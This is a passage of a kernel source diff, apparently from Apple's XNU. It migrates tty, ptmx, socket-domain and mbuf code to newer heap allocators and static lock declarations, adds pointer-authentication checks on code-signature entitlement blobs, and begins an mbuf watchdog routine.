tty_lck_grp, tty_lck_attr); + lck_mtx_init(&tp->t_lock, &tty_lck_grp, LCK_ATTR_NULL); klist_init(&tp->t_rsel.si_note); klist_init(&tp->t_wsel.si_note); tp->t_refcnt = 1; @@ -3263,8 +3235,8 @@ ttydeallocate(struct tty *tp) clfree(&tp->t_rawq); clfree(&tp->t_canq); clfree(&tp->t_outq); - lck_mtx_destroy(&tp->t_lock, tty_lck_grp); - FREE(tp, M_TTYS); + lck_mtx_destroy(&tp->t_lock, &tty_lck_grp); + kheap_free(KM_TTYS, tp, sizeof(struct tty)); } diff --git a/bsd/kern/tty_ptmx.c b/bsd/kern/tty_ptmx.c index d4efb5c12..f505e9243 100644 --- a/bsd/kern/tty_ptmx.c +++ b/bsd/kern/tty_ptmx.c @@ -290,13 +290,14 @@ ptmx_get_ioctl(int minor, int open_flag) } DEVFS_UNLOCK(); - MALLOC(new_ptmx_ioctl, struct ptmx_ioctl *, sizeof(struct ptmx_ioctl), M_TTYS, M_WAITOK | M_ZERO); + new_ptmx_ioctl = kheap_alloc(KM_TTYS, sizeof(struct ptmx_ioctl), + Z_WAITOK | Z_ZERO); if (new_ptmx_ioctl == NULL) { return NULL; } if ((new_ptmx_ioctl->pt_tty = ttymalloc()) == NULL) { - FREE(new_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl)); return NULL; } @@ -315,7 +316,7 @@ ptmx_get_ioctl(int minor, int open_flag) if ((_state.pis_total - _state.pis_free) >= ptmx_max) { ttyfree(new_ptmx_ioctl->pt_tty); DEVFS_UNLOCK(); - FREE(new_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl)); return NULL; } @@ -323,39 +324,42 @@ ptmx_get_ioctl(int minor, int open_flag) if (_state.pis_free == 0) { struct ptmx_ioctl **new_pis_ioctl_list; struct ptmx_ioctl **old_pis_ioctl_list = NULL; + size_t old_pis_total = 0; /* Yes. */ - MALLOC(new_pis_ioctl_list, struct ptmx_ioctl **, sizeof(struct ptmx_ioctl *) * (_state.pis_total + PTMX_GROW_VECTOR), M_TTYS, M_WAITOK | M_ZERO); + new_pis_ioctl_list = kheap_alloc(KM_TTYS, + sizeof(struct ptmx_ioctl *) * (_state.pis_total + PTMX_GROW_VECTOR), + Z_WAITOK | Z_ZERO); if (new_pis_ioctl_list == NULL) { ttyfree(new_ptmx_ioctl->pt_tty); DEVFS_UNLOCK(); - FREE(new_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl)); return NULL; } /* If this is not the first time, copy the old over */ bcopy(_state.pis_ioctl_list, new_pis_ioctl_list, sizeof(struct ptmx_ioctl *) * _state.pis_total); old_pis_ioctl_list = _state.pis_ioctl_list; + old_pis_total = _state.pis_total; _state.pis_ioctl_list = new_pis_ioctl_list; _state.pis_free += PTMX_GROW_VECTOR; _state.pis_total += PTMX_GROW_VECTOR; - if (old_pis_ioctl_list) { - FREE(old_pis_ioctl_list, M_TTYS); - } + kheap_free(KM_TTYS, old_pis_ioctl_list, + sizeof(struct ptmx_ioctl *) * old_pis_total); } /* is minor in range now? */ if (minor < 0 || minor >= _state.pis_total) { ttyfree(new_ptmx_ioctl->pt_tty); DEVFS_UNLOCK(); - FREE(new_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl)); return NULL; } if (_state.pis_ioctl_list[minor] != NULL) { ttyfree(new_ptmx_ioctl->pt_tty); DEVFS_UNLOCK(); - FREE(new_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl)); /* Special error value so we know to redrive the open, we've been raced */ return (struct ptmx_ioctl*)-1; @@ -437,7 +441,7 @@ ptmx_free_ioctl(int minor, int open_flag) devfs_remove(old_ptmx_ioctl->pt_devhandle); } ttyfree(old_ptmx_ioctl->pt_tty); - FREE(old_ptmx_ioctl, M_TTYS); + kheap_free(KM_TTYS, old_ptmx_ioctl, sizeof(struct ptmx_ioctl)); } return 0; /* Success */ diff --git a/bsd/kern/ubc_subr.c b/bsd/kern/ubc_subr.c index 8304c009d..320e71ef7 100644 --- a/bsd/kern/ubc_subr.c +++ b/bsd/kern/ubc_subr.c @@ -777,6 +777,11 @@ csblob_get_entitlements(struct cs_blob *csblob, void **out_start, size_t *out_le } csblob->csb_hashtype->cs_init(&context); + ptrauth_utils_auth_blob_generic(entitlements, + ntohl(entitlements->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY, + csblob->csb_entitlements_blob_signature); csblob->csb_hashtype->cs_update(&context, entitlements, ntohl(entitlements->length)); csblob->csb_hashtype->cs_final(computed_hash, &context); @@ -3082,6 +3087,12 @@ ubc_cs_reconstitute_code_signature(struct cs_blob const *blob, vm_size_t optiona if (blob->csb_entitlements_blob) { /* We need to add a slot for the entitlements */ + ptrauth_utils_auth_blob_generic(blob->csb_entitlements_blob, + ntohl(blob->csb_entitlements_blob->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY, + blob->csb_entitlements_blob_signature); + new_blob_size += sizeof(CS_BlobIndex); new_blob_size += ntohl(blob->csb_entitlements_blob->length); } @@ -3112,6 +3123,12 @@ ubc_cs_reconstitute_code_signature(struct cs_blob const *blob, vm_size_t optiona new_superblob->index[1].type = htonl(CSSLOT_ENTITLEMENTS); new_superblob->index[1].offset = htonl((uint32_t)ent_offset); + ptrauth_utils_auth_blob_generic(blob->csb_entitlements_blob, + ntohl(blob->csb_entitlements_blob->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY, + blob->csb_entitlements_blob_signature); + memcpy((void *)(new_blob_addr + ent_offset), blob->csb_entitlements_blob, ntohl(blob->csb_entitlements_blob->length)); new_cd = (CS_CodeDirectory *)(new_blob_addr + cd_offset); @@ -3242,12 +3259,18 @@ ubc_cs_convert_to_multilevel_hash(struct cs_blob *blob) } /* New Code Directory is ready for use, swap it out in the blob structure */ - ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size); + ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size); blob->csb_mem_size = new_blob_size; - blob->csb_mem_kaddr = new_blob_addr; + blob->csb_mem_kaddr = (void *)new_blob_addr; blob->csb_cd = cd; blob->csb_entitlements_blob = entitlements; + if (blob->csb_entitlements_blob != NULL) { + blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob, + ntohl(blob->csb_entitlements_blob->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY); + } /* The blob has some cached attributes of the Code Directory, so update those */ @@ -3301,7 +3324,7 @@ cs_blob_create_validated( /* fill in the new blob */ blob->csb_mem_size = size; blob->csb_mem_offset = 0; - blob->csb_mem_kaddr = *addr; + blob->csb_mem_kaddr = (void *)*addr; blob->csb_flags = 0; blob->csb_signer_type = CS_SIGNER_TYPE_UNKNOWN; blob->csb_platform_binary = 0; @@ -3339,6 +3362,12 @@ cs_blob_create_validated( blob->csb_cd = cd; blob->csb_entitlements_blob = entitlements; /* may be NULL, not yet validated */ + if (blob->csb_entitlements_blob != NULL) { + blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob, + ntohl(blob->csb_entitlements_blob->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY); + } blob->csb_hashtype = cs_find_md(cd->hashType); if (blob->csb_hashtype == NULL || blob->csb_hashtype->cs_digest_size > sizeof(hash)) { panic("validated CodeDirectory but unsupported type"); @@ -3412,8 +3441,8 @@ cs_blob_free( { if (blob != NULL) { if (blob->csb_mem_kaddr) { - ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size); - blob->csb_mem_kaddr = 0; + ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size); + blob->csb_mem_kaddr = NULL; } if (blob->csb_entitlements != NULL) { osobject_release(blob->csb_entitlements); @@ -3547,12 +3576,18 @@ ubc_cs_blob_add( goto out; } - ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size); + ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size); - blob->csb_mem_kaddr = new_mem_kaddr; + blob->csb_mem_kaddr = (void *)new_mem_kaddr; blob->csb_mem_size = new_mem_size; blob->csb_cd = new_cd; blob->csb_entitlements_blob = new_entitlements; + if (blob->csb_entitlements_blob != NULL) { + blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob, + ntohl(blob->csb_entitlements_blob->length), + OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"), + PTRAUTH_ADDR_DIVERSIFY); + } blob->csb_reconstituted = true; } #endif @@ -4379,7 +4414,7 @@ cs_validate_hash( } /* blob data has been released */ - kaddr = blob->csb_mem_kaddr; + kaddr = (vm_offset_t)blob->csb_mem_kaddr; if (kaddr == 0) { continue; } diff --git a/bsd/kern/uipc_domain.c b/bsd/kern/uipc_domain.c index c1f6a3efb..0a6b54ed9 100644 --- a/bsd/kern/uipc_domain.c +++ b/bsd/kern/uipc_domain.c @@ -100,11 +100,12 @@ static boolean_t domain_draining; static void domain_sched_timeout(void); static void domain_timeout(void *); -lck_grp_t *domain_proto_mtx_grp; -lck_attr_t *domain_proto_mtx_attr; -static lck_grp_attr_t *domain_proto_mtx_grp_attr; -decl_lck_mtx_data(static, domain_proto_mtx); -decl_lck_mtx_data(static, domain_timeout_mtx); +static LCK_GRP_DECLARE(domain_proto_mtx_grp, "domain"); +static LCK_ATTR_DECLARE(domain_proto_mtx_attr, 0, 0); +static LCK_MTX_DECLARE_ATTR(domain_proto_mtx, + &domain_proto_mtx_grp, &domain_proto_mtx_attr); +static LCK_MTX_DECLARE_ATTR(domain_timeout_mtx, + &domain_proto_mtx_grp, &domain_proto_mtx_attr); u_int64_t _net_uptime; u_int64_t _net_uptime_ms; @@ -196,8 +197,8 @@ init_domain(struct domain *dp) VERIFY(dp->dom_flags & DOM_ATTACHED); if (!(dp->dom_flags & DOM_INITIALIZED)) { - lck_mtx_init(&dp->dom_mtx_s, domain_proto_mtx_grp, - domain_proto_mtx_attr); + lck_mtx_init(&dp->dom_mtx_s, &domain_proto_mtx_grp, + &domain_proto_mtx_attr); dp->dom_mtx = &dp->dom_mtx_s; TAILQ_INIT(&dp->dom_protosw); if (dp->dom_init != NULL) { @@ -290,7 +291,7 @@ net_add_domain_old(struct domain_old *odp) /* NOTREACHED */ } - dp = _MALLOC(sizeof(*dp), M_TEMP, M_WAITOK | M_ZERO); + dp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct domain), Z_WAITOK | Z_ZERO); if (dp == NULL) { /* * There is really nothing better than to panic here, @@ -360,15 +361,15 @@ net_del_domain_old(struct domain_old *odp) TAILQ_FOREACH_SAFE(pp1, &dp1->dom_protosw, pr_entry, pp2) { detach_proto(pp1, dp1); if (pp1->pr_usrreqs->pru_flags & PRUF_OLD) { - FREE(pp1->pr_usrreqs, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp1->pr_usrreqs, sizeof(struct pr_usrreqs)); } if (pp1->pr_flags & PR_OLD) { - FREE(pp1, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp1, sizeof(struct protosw)); } } detach_domain(dp1); - FREE(dp1, M_TEMP); + kheap_free(KHEAP_DEFAULT, dp1, sizeof(struct domain)); } else { error = EPFNOSUPPORT; } @@ -485,7 +486,8 @@ net_add_proto_old(struct protosw_old *opp, struct domain_old *odp) /* NOTREACHED */ } - pru = _MALLOC(sizeof(*pru), M_TEMP, M_WAITOK | M_ZERO); + pru = kheap_alloc(KHEAP_DEFAULT, sizeof(struct pr_usrreqs), + Z_WAITOK | Z_ZERO); if (pru == NULL) { error = ENOMEM; goto done; @@ -513,7 +515,7 @@ net_add_proto_old(struct protosw_old *opp, struct domain_old *odp) pru->pru_soreceive = opru->pru_soreceive; pru->pru_sopoll = opru->pru_sopoll; - pp = _MALLOC(sizeof(*pp), M_TEMP, M_WAITOK | M_ZERO); + pp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct protosw), Z_WAITOK | Z_ZERO); if (pp == NULL) { error = ENOMEM; goto done; @@ -559,12 +561,8 @@ done: "error %d\n", __func__, odp->dom_family, odp->dom_name, opp->pr_protocol, error); - if (pru != NULL) { - FREE(pru, M_TEMP); - } - if (pp != NULL) { - FREE(pp, M_TEMP); - } + kheap_free(KHEAP_DEFAULT, pru, sizeof(struct pr_usrreqs)); + kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw)); } domain_guard_release(guard); @@ -602,10 +600,10 @@ net_del_proto(int type, int protocol, struct domain *dp) detach_proto(pp, dp); if (pp->pr_usrreqs->pru_flags & PRUF_OLD) { - FREE(pp->pr_usrreqs, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp->pr_usrreqs, sizeof(struct pr_usrreqs)); } if (pp->pr_flags & PR_OLD) { - FREE(pp, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw)); } return 0; @@ -653,10 +651,10 @@ net_del_proto_old(int type, int protocol, struct domain_old *odp) } detach_proto(pp, dp); if (pp->pr_usrreqs->pru_flags & PRUF_OLD) { - FREE(pp->pr_usrreqs, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp->pr_usrreqs, sizeof(struct pr_usrreqs)); } if (pp->pr_flags & PR_OLD) { - FREE(pp, M_TEMP); + kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw)); } done: @@ -736,23 +734,6 @@ domaininit(void) domain_guard_t guard; eventhandler_lists_ctxt_init(&protoctl_evhdlr_ctxt); - /* - * allocate lock group attribute and group for domain mutexes - */ - domain_proto_mtx_grp_attr = lck_grp_attr_alloc_init(); - - domain_proto_mtx_grp = lck_grp_alloc_init("domain", - domain_proto_mtx_grp_attr); - - /* - * allocate the lock attribute for per domain mutexes - */ - domain_proto_mtx_attr = lck_attr_alloc_init(); - - lck_mtx_init(&domain_proto_mtx, domain_proto_mtx_grp, - domain_proto_mtx_attr); - lck_mtx_init(&domain_timeout_mtx, domain_proto_mtx_grp, - domain_proto_mtx_attr); guard = domain_guard_deploy(); /* diff --git a/bsd/kern/uipc_mbuf.c b/bsd/kern/uipc_mbuf.c index ab5dbd324..f73bcbda5 100644 --- a/bsd/kern/uipc_mbuf.c +++ b/bsd/kern/uipc_mbuf.c @@ -80,6 +80,8 @@ #include #include #include +#include +#include #include @@ -88,7 +90,7 @@ #include #include #include -#include +#include #include #include @@ -96,6 +98,7 @@ #include #include +#include #include @@ -303,7 +306,6 @@ /* TODO: should be in header file */ /* kernel translater */ -extern vm_offset_t kmem_mb_alloc(vm_map_t, int, int, kern_return_t *); extern ppnum_t pmap_find_phys(pmap_t pmap, addr64_t va); extern vm_map_t mb_map; /* special map */ @@ -325,11 +327,9 @@ static const char *mb_kmem_stats_labels[] = { "INVALID_ARGUMENT", "OTHERS" }; /* Global lock */ -decl_lck_mtx_data(static, mbuf_mlock_data); -static lck_mtx_t *mbuf_mlock = &mbuf_mlock_data; -static lck_attr_t *mbuf_mlock_attr; -static lck_grp_t *mbuf_mlock_grp; -static lck_grp_attr_t *mbuf_mlock_grp_attr; +static LCK_GRP_DECLARE(mbuf_mlock_grp, "mbuf"); +static LCK_MTX_DECLARE(mbuf_mlock_data, &mbuf_mlock_grp); +static lck_mtx_t *const mbuf_mlock = &mbuf_mlock_data; /* Back-end (common) layer */ static uint64_t mb_expand_cnt; @@ -577,11 +577,9 @@ static struct mtrace *mleak_traces; static struct mtrace *mleak_top_trace[MLEAK_NUM_TRACES]; /* Lock to protect mleak tables from concurrent modification */ -decl_lck_mtx_data(static, mleak_lock_data); -static lck_mtx_t *mleak_lock = &mleak_lock_data; -static lck_attr_t *mleak_lock_attr; -static lck_grp_t *mleak_lock_grp; -static lck_grp_attr_t *mleak_lock_grp_attr; +static LCK_GRP_DECLARE(mleak_lock_grp, "mleak_lock"); +static LCK_MTX_DECLARE(mleak_lock_data, &mleak_lock_grp); +static lck_mtx_t *const mleak_lock = &mleak_lock_data; /* *Failed* large allocations. */ struct mtracelarge { @@ -596,11 +594,8 @@ static struct mtracelarge mtracelarge_table[MTRACELARGE_NUM_TRACES]; static void mtracelarge_register(size_t size); /* Lock to protect the completion callback table */ -static lck_grp_attr_t *mbuf_tx_compl_tbl_lck_grp_attr = NULL; -static lck_attr_t *mbuf_tx_compl_tbl_lck_attr = NULL; -static lck_grp_t *mbuf_tx_compl_tbl_lck_grp = NULL; -decl_lck_rw_data(, mbuf_tx_compl_tbl_lck_rw_data); -lck_rw_t *mbuf_tx_compl_tbl_lock = &mbuf_tx_compl_tbl_lck_rw_data; +static LCK_GRP_DECLARE(mbuf_tx_compl_tbl_lck_grp, "mbuf_tx_compl_tbl"); +LCK_RW_DECLARE(mbuf_tx_compl_tbl_lock, &mbuf_tx_compl_tbl_lck_grp); extern u_int32_t high_sb_max; @@ -1028,24 +1023,14 @@ struct mbstat mbstat; * anything beyond that (up to type 255) is considered a corner case. */ typedef struct { - unsigned int cpu_mtypes[MT_MAX]; -} __attribute__((aligned(MAX_CPU_CACHE_LINE_SIZE), packed)) mtypes_cpu_t; - -typedef struct { - mtypes_cpu_t mbs_cpu[1]; + unsigned int cpu_mtypes[MT_MAX]; } mbuf_mtypes_t; -static mbuf_mtypes_t *mbuf_mtypes; /* per-CPU statistics */ - -#define MBUF_MTYPES_SIZE(n) \ - __builtin_offsetof(mbuf_mtypes_t, mbs_cpu[n]) - -#define MTYPES_CPU(p) \ - ((mtypes_cpu_t *)(void *)((char *)(p) + MBUF_MTYPES_SIZE(cpu_number()))) +static mbuf_mtypes_t PERCPU_DATA(mbuf_mtypes); #define mtype_stat_add(type, n) { \ if ((unsigned)(type) < MT_MAX) { \ - mtypes_cpu_t *mbs = MTYPES_CPU(mbuf_mtypes); \ + mbuf_mtypes_t *mbs = PERCPU_GET(mbuf_mtypes); \ atomic_add_32(&mbs->cpu_mtypes[type], n); \ } else if ((unsigned)(type) < (unsigned)MBSTAT_MTYPES_MAX) { \ atomic_add_16((int16_t *)&mbstat.m_mtypes[type], n); \ @@ -1059,29 +1044,23 @@ static mbuf_mtypes_t *mbuf_mtypes; /* per-CPU statistics */ static void mbuf_mtypes_sync(boolean_t locked) { - int m, n; - mtypes_cpu_t mtc; + mbuf_mtypes_t mtc; if (locked) { LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED); } - bzero(&mtc, sizeof(mtc)); - for (m = 0; m < ncpu; m++) { - mtypes_cpu_t *scp = &mbuf_mtypes->mbs_cpu[m]; - mtypes_cpu_t temp; - - bcopy(&scp->cpu_mtypes, &temp.cpu_mtypes, - sizeof(temp.cpu_mtypes)); - - for (n = 0; n < MT_MAX; n++) { - mtc.cpu_mtypes[n] += temp.cpu_mtypes[n]; + mtc = *PERCPU_GET_MASTER(mbuf_mtypes); + percpu_foreach_secondary(mtype, mbuf_mtypes) { + for (int n = 0; n < MT_MAX; n++) { + mtc.cpu_mtypes[n] += mtype->cpu_mtypes[n]; } } + if (!locked) { lck_mtx_lock(mbuf_mlock); } - for (n = 0; n < MT_MAX; n++) { + for (int n = 0; n < MT_MAX; n++) { mbstat.m_mtypes[n] = mtc.cpu_mtypes[n]; } if (!locked) { @@ -1302,13 +1281,11 @@ mbuf_table_init(void) unsigned int b, c, s; int m, config_mbuf_jumbo = 0; - MALLOC(omb_stat, struct omb_stat *, OMB_STAT_SIZE(NELEM(mbuf_table)), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(omb_stat != NULL); + omb_stat = zalloc_permanent(OMB_STAT_SIZE(NELEM(mbuf_table)), + ZALIGN(struct omb_stat)); - MALLOC(mb_stat, mb_stat_t *, MB_STAT_SIZE(NELEM(mbuf_table)), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mb_stat != NULL); + mb_stat = zalloc_permanent(MB_STAT_SIZE(NELEM(mbuf_table)), + ZALIGN(mb_stat_t)); mb_stat->mbs_cnt = NELEM(mbuf_table); for (m = 0; m < NELEM(mbuf_table); m++) { @@ -1466,13 +1443,49 @@ mbuf_get_class(struct mbuf *m) bool mbuf_class_under_pressure(struct mbuf *m) { - int mclass = mbuf_get_class(m); // TODO - how can we get the class easily??? + int mclass = mbuf_get_class(m); + + if (m_total(mclass) - m_infree(mclass) >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) { + /* + * The above computation does not include the per-CPU cached objects. + * As a fast-path check this is good-enough. But now we do + * the "slower" count of the cached objects to know exactly the + * number of active mbufs in use. + * + * We do not take the mbuf_lock here to avoid lock-contention. Numbers + * might be slightly off but we don't try to be 100% accurate. + * At worst, we drop a packet that we shouldn't have dropped or + * we might go slightly above our memory-pressure threshold. + */ + mcache_t *cp = m_cache(mclass); + mcache_cpu_t *ccp = &cp->mc_cpu[0]; + + int bktsize = os_access_once(ccp->cc_bktsize); + uint32_t bl_total = os_access_once(cp->mc_full.bl_total); + uint32_t cached = 0; + int i; + + for (i = 0; i < ncpu; i++) { + ccp = &cp->mc_cpu[i]; + + int cc_objs = os_access_once(ccp->cc_objs); + if (cc_objs > 0) { + cached += cc_objs; + } + + int cc_pobjs = os_access_once(ccp->cc_pobjs); + if (cc_pobjs > 0) { + cached += cc_pobjs; + } + } + cached += (bl_total * bktsize); - if (m_total(mclass) >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) { - os_log(OS_LOG_DEFAULT, - "%s memory-pressure on mbuf due to class %u, total %u max %u", - __func__, mclass, m_total(mclass), m_maxlimit(mclass)); - return true; + if (m_total(mclass) - m_infree(mclass) - cached >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) { + os_log(OS_LOG_DEFAULT, + "%s memory-pressure on mbuf due to class %u, total %u free %u cached %u max %u", + __func__, mclass, m_total(mclass), m_infree(mclass), cached, m_maxlimit(mclass)); + return true; + } } return false; @@ -1527,7 +1540,6 @@ mbinit(void) { unsigned int m; unsigned int initmcl = 0; - void *buf; thread_t thread = THREAD_NULL; microuptime(&mb_start); @@ -1628,12 +1640,6 @@ mbinit(void) /* Setup the mbuf table */ mbuf_table_init(); - /* Global lock for common layer */ - mbuf_mlock_grp_attr = lck_grp_attr_alloc_init(); - mbuf_mlock_grp = lck_grp_alloc_init("mbuf", mbuf_mlock_grp_attr); - mbuf_mlock_attr = lck_attr_alloc_init(); - lck_mtx_init(mbuf_mlock, mbuf_mlock_grp, mbuf_mlock_attr); - /* * Allocate cluster slabs table: * @@ -1644,9 +1650,8 @@ mbinit(void) */ maxslabgrp = (P2ROUNDUP(nmbclusters, (MBSIZE >> MCLSHIFT)) << MCLSHIFT) >> MBSHIFT; - MALLOC(slabstbl, mcl_slabg_t * *, maxslabgrp * sizeof(mcl_slabg_t *), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(slabstbl != NULL); + slabstbl = zalloc_permanent(maxslabgrp * sizeof(mcl_slabg_t *), + ZALIGN(mcl_slabg_t)); /* * Allocate audit structures, if needed: @@ -1661,14 +1666,11 @@ mbinit(void) int l; mcl_audit_t *mclad; maxclaudit = ((maxslabgrp << MBSHIFT) >> PAGE_SHIFT); - MALLOC(mclaudit, mcl_audit_t *, maxclaudit * sizeof(*mclaudit), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mclaudit != NULL); + mclaudit = zalloc_permanent(maxclaudit * sizeof(*mclaudit), + ZALIGN(mcl_audit_t)); for (l = 0, mclad = mclaudit; l < maxclaudit; l++) { - MALLOC(mclad[l].cl_audit, mcache_audit_t * *, - NMBPG * sizeof(mcache_audit_t *), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mclad[l].cl_audit != NULL); + mclad[l].cl_audit = zalloc_permanent(NMBPG * sizeof(mcache_audit_t *), + ZALIGN_PTR); } mcl_audit_con_cache = mcache_create("mcl_audit_contents", @@ -1682,11 +1684,6 @@ mbinit(void) /* Enable mbuf leak logging, with a lock to protect the tables */ - mleak_lock_grp_attr = lck_grp_attr_alloc_init(); - mleak_lock_grp = lck_grp_alloc_init("mleak_lock", mleak_lock_grp_attr); - mleak_lock_attr = lck_attr_alloc_init(); - lck_mtx_init(mleak_lock, mleak_lock_grp, mleak_lock_attr); - mleak_activate(); /* @@ -1696,23 +1693,14 @@ mbinit(void) * before alignment is not saved. */ ncpu = ml_wait_max_cpus(); - MALLOC(buf, void *, MBUF_MTYPES_SIZE(ncpu) + CPU_CACHE_LINE_SIZE, - M_TEMP, M_WAITOK); - VERIFY(buf != NULL); - - mbuf_mtypes = (mbuf_mtypes_t *)P2ROUNDUP((intptr_t)buf, - CPU_CACHE_LINE_SIZE); - bzero(mbuf_mtypes, MBUF_MTYPES_SIZE(ncpu)); /* Calculate the number of pages assigned to the cluster pool */ mcl_pages = (nmbclusters << MCLSHIFT) / PAGE_SIZE; - MALLOC(mcl_paddr, ppnum_t *, mcl_pages * sizeof(ppnum_t), - M_TEMP, M_WAITOK); - VERIFY(mcl_paddr != NULL); + mcl_paddr = zalloc_permanent(mcl_pages * sizeof(ppnum_t), + ZALIGN(ppnum_t)); /* Register with the I/O Bus mapper */ mcl_paddr_base = IOMapperIOVMAlloc(mcl_pages); - bzero((char *)mcl_paddr, mcl_pages * sizeof(ppnum_t)); embutl = (mbutl + (nmbclusters * MCLBYTES)); VERIFY(((embutl - mbutl) % MBIGCLBYTES) == 0); @@ -1820,8 +1808,7 @@ mbinit(void) } /* allocate space for mbuf_dump_buf */ - MALLOC(mbuf_dump_buf, char *, MBUF_DUMP_BUF_SIZE, M_TEMP, M_WAITOK); - VERIFY(mbuf_dump_buf != NULL); + mbuf_dump_buf = zalloc_permanent(MBUF_DUMP_BUF_SIZE, ZALIGN_NONE); if (mbuf_debug & MCF_DEBUG) { printf("%s: MLEN %d, MHLEN %d\n", __func__, @@ -1832,26 +1819,6 @@ mbinit(void) (nmbclusters << MCLSHIFT) >> MBSHIFT, (nclusters << MCLSHIFT) >> MBSHIFT, (njcl << MCLSHIFT) >> MBSHIFT); - - /* initialize lock form tx completion callback table */ - mbuf_tx_compl_tbl_lck_grp_attr = lck_grp_attr_alloc_init(); - if (mbuf_tx_compl_tbl_lck_grp_attr == NULL) { - panic("%s: lck_grp_attr_alloc_init failed", __func__); - /* NOTREACHED */ - } - mbuf_tx_compl_tbl_lck_grp = lck_grp_alloc_init("mbuf_tx_compl_tbl", - mbuf_tx_compl_tbl_lck_grp_attr); - if (mbuf_tx_compl_tbl_lck_grp == NULL) { - panic("%s: lck_grp_alloc_init failed", __func__); - /* NOTREACHED */ - } - mbuf_tx_compl_tbl_lck_attr = lck_attr_alloc_init(); - if (mbuf_tx_compl_tbl_lck_attr == NULL) { - panic("%s: lck_attr_alloc_init failed", __func__); - /* NOTREACHED */ - } - lck_rw_init(mbuf_tx_compl_tbl_lock, mbuf_tx_compl_tbl_lck_grp, - mbuf_tx_compl_tbl_lck_attr); } /* @@ -2995,6 +2962,30 @@ m_vm_error_stats(uint32_t *cnt, uint64_t *ts, uint64_t *size, } } +static vm_offset_t +kmem_mb_alloc(vm_map_t mbmap, int size, int physContig, kern_return_t *err) +{ + vm_offset_t addr = 0; + kern_return_t kr = KERN_SUCCESS; + + if (!physContig) { + kr = kernel_memory_allocate(mbmap, &addr, size, 0, + KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF); + } else { + kr = kmem_alloc_contig(mbmap, &addr, size, PAGE_MASK, 0xfffff, + 0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF); + } + + if (kr != KERN_SUCCESS) { + addr = 0; + } + if (err) { + *err = kr; + } + + return addr; +} + /* * Allocate some number of mbuf clusters and place on cluster freelist. */ @@ -6786,6 +6777,110 @@ mbuf_waiter_dec(mbuf_class_t class, boolean_t comp) } } +static bool mbuf_watchdog_defunct_active = false; + +static uint32_t +mbuf_watchdog_socket_space(struct socket *so) +{ + if (so == NULL) { + return 0; + } + + return so->so_snd.sb_mbcnt + so->so_rcv.sb_mbcnt; +} + +struct mbuf_watchdog_defunct_args { + struct proc *top_app; + uint32_t top_app_space_used; +}; + +static int +mbuf_watchdog_defunct_iterate(proc_t p, void *arg) +{ + struct fileproc *fp = NULL; + struct mbuf_watchdog_defunct_args *args = + (struct mbuf_watchdog_defunct_args *)arg; + uint32_t space_used = 0; + + proc_fdlock(p); + fdt_foreach(fp, p) { + struct fileglob *fg = fp->fp_glob; + struct socket *so = NULL; + + if (FILEGLOB_DTYPE(fg) != DTYPE_SOCKET) { + continue; + } + so = (struct socket *)fp->fp_glob->fg_data; + /* + * We calculate the space without the socket + * lock because we don't want to be blocked + * by another process that called send() and + * is stuck waiting for mbufs. + * + * These variables are 32-bit so we don't have + * to worry about incomplete reads. + */ + space_used += mbuf_watchdog_socket_space(so); + } + proc_fdunlock(p); + if (space_used > args->top_app_space_used) { + if (args->top_app != NULL) { + proc_rele(args->top_app); + } + args->top_app = p; + args->top_app_space_used = space_used; + + return PROC_CLAIMED; + } else { + return PROC_RETURNED; + } +} + +extern char *proc_name_address(void *p); + +static void +mbuf_watchdog_defunct(thread_call_param_t arg0, thread_call_param_t arg1) +{ +#pragma 